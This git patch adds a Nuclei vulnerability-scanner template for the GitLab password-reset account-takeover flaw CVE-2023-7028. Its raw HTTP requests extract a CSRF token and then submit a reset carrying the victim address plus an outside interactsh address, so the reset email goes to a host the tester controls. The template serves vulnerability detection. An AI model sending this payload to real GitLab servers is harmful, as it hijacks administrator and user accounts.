From aab1f47ba13bc825a7a504dd8646382f5bd6b1ed Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Sun, 14 Jan 2024 12:58:32 +0530
Subject: [PATCH] Create CVE-2023-7028.yaml

---
 http/cves/2023/CVE-2023-7028.yaml | 77 +++++++++++++++++++++++++++++++
 1 file changed, 77 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-7028.yaml

diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml
new file mode 100644
index 0000000000..eeda0873ad
--- /dev/null
+++ b/http/cves/2023/CVE-2023-7028.yaml
@@ -0,0 +1,77 @@
+id: CVE-2023-7028
+
+info:
+  name: GitLab Account Takeover via Password Reset without user interactions
+  author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
+  severity: critical
+  description: |
+    An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
+  reference:
+    - https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
+    - https://x.com/rwincey/status/1745659710089437368?s=20
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: gitlab
+    product: gitlab
+    shodan-query: title:"Gitlab"
+  tags: cve,cve2023,gitlab,auth-bypass
+
+flow: |
+  http(1);
+  http(2);
+
+http:
+  - raw:
+      - |
+        GET /users/sign_in HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        @timeout: 30s
+        POST /users/password HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+        Referer: {{RootURL}}/users/password/new
+
+        authenticity_token={{token}}&user[email][]=admin@example.com&user[email][]=nuclei@{{interactsh-url}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(interactsh_protocol, 'smtp')"
+
+    extractors:
+      - type: regex
+        part: body
+        name: token
+        group: 1
+        regex:
+          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 30s
+        POST /users/password HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+        Referer: {{RootURL}}/users/password/new
+
+        authenticity_token={{token}}&user[email][]={{username}}@{{RDN}}&user[email][]=nuclei@{{interactsh-url}}
+
+    payloads:
+      username:
+        - admin
+        - root
+        - gitlab
+        - git
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(interactsh_protocol, 'smtp')"